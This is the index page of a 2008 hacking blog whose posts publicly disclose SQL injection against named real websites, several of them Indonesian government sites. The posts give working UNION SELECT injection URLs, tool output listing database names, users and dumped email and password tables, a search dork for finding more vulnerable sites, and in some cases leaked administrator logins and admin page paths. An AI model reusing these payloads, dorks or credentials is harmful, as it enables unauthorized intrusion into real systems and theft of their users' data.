viperfx07 blog (hack + crack + web + app)

viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Monday, November 24, 2008

[SQLi] http://www.grouply.com

5:53 PM Posted by viperfx07 No comments
Intro: it's like the http://www.faniq.com case, i'm tired being invited to join some sites that are not even useful for me :) I decided to check, and again, voila, it's vulnerable :)PoC: http://www.grouply.com/register.php?rem=[SQLi]Demo: http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3/*Database info:[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*[+]...

Sunday, November 23, 2008

[SQLi] http://www.faniq.com

6:03 PM Posted by viperfx07 No comments
Intro: it was funny. I found this vulnerability when i was about to unsubscribe, and voila, it was vulnerable. The password is not encrypted, so there is a chance that we can access members' email that has the password as they entered when they were registering.PoC : http://www.faniq.com/unsubscribe.php?invite_id=[SQLi]Demo:...

Saturday, November 22, 2008

[SQLi] http://www.broadsword.com.au

8:32 PM Posted by viperfx07 No comments
Tools: schemafuzz.pyDatabase info: [+] URL: http://www.broadsword.com.au/news.php?id=35+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6--[+] Evasion Used: "+" "--"[+] 20:20:43[-] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: broadsword User: broadsword@localhost Version: 4.1.22[+] Dumping data from database "broadsword" Table "users"[+] and Column(s) ['email', 'password'][+] Number...

[SQLi] http://www.highperformancesailing.com.au

7:17 PM Posted by viperfx07 No comments
Tools = schemafuzz.pyAdmin page = http://www.highperformancesailing.com.au/admin/Admin usr/pwd = admin:adminDatabase info:[+] URL:http://www.highperformancesailing.com.au/news.php?id=31+AND+1=2+UNION+SELECT+0,sqli,2,3--[+] Evasion Used: "+" "--"[+] 19:12:04[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: sailing_hps User: sailing_sailing@localhost Version: 5.0.51a-community[Database]:...

[SQLi] http://www.westcare.com.au

6:52 PM Posted by viperfx07 No comments
Tools: schemafuzz.pyAdmin page: http://www.westcare.com.au/admin/[+] URL:http://www.westcare.com.au/news.php?id=26+AND+1=2+UNION+SELECT+sqli,1--[+] Evasion Used: "+" "--"[+] 18:49:07[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: westcare_cms User: westcare_cmsuser@localhost...

[SQLi] BigKid Designs Websites

6:34 PM Posted by viperfx07 No comments
Dork = inurl:news.php?p=shwPoC = http://www.site.com/news.php?p=shw&id=[SQLi]Demo = http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8--Database structure:[+] URL:http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,unhex(hex(sqli)),4,5,6,7,8--[+] Evasion Used: "+" "--"[+] 18:08:49[+] Proxy Not Given[+] Gathering MySQL...

Friday, November 21, 2008

[SQLi] http://www.imigrasi.co.id

5:25 PM Posted by viperfx07 No comments
PoC: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=[SQli]Demo: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=1+and+1=2+union+select+1,2,concat_ws(0x3a,usrID,usrPwd),4,5,6,7,8+from+users+limit+0,1--Tools: RainbowCrack at irc.plain-text.infoAdmin usr/pwd: admin:123qweasdzxcAdmin...

Sunday, November 16, 2008

[SQLi] http://www.dotaportal.com

10:14 AM Posted by viperfx07 No comments
PoC: http://www.dotaportal.com/index.php?act=items&id=[SQLi]Demo: http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7/*Database info:[+] URL:http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3,4,5,6,7/*[+] Evasion Used: "/**/" "/*"[+] 10:40:26[+] Proxy Not Given[+] Gathering MySQL Server...

Friday, November 14, 2008

[SQLi] http://www.bbpk.go.id

2:20 PM Posted by viperfx07 No comments
PoC: http://www.bbpk.go.id/main/?option=com_other&tbl=1&id=[SQLi]Demo: http://www.bbpk.go.id/main/?option=com_other&tbl=1&id=5+AND+1=2+UNION+SELECT+group_concat(username,0x3a,password,0xd),1+from+mos_users--"Problem: can't decrypt passw...

[SQLi] http://www.gunungkidulkab.go.id

1:58 PM Posted by viperfx07 No comments
Tool: schemafuzz.py v5.0Admin login loc: http://www.gunungkidulkab.go.id/gerbangkabupaten.phpProblem: can't login?[+] URL:http://www.gunungkidulkab.go.id/home.php?mode=content&id=177+AND+1=2+UNION+SELECT+0,1,2,3,4,sqli,6,7,8,9,10,11,12,13--[+] Evasion Used: "+" "--"[+] 13:17:12[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: dbportalgunungkidul User: gunungkidulkab.g@localhost...

Monday, November 10, 2008

[SQLi] http://www.sulut.go.id

5:23 PM Posted by viperfx07 2 comments
Problem: Admin directory found, but it's forbidden...Admin dir: http://www.sulut.go.id/admin/Dump:[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*[+] Evasion Used: "/**/" "/*"[+] 16:48:27[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: sulut User: sulut@localhost Version: 5.0.27[+] Showing all databases...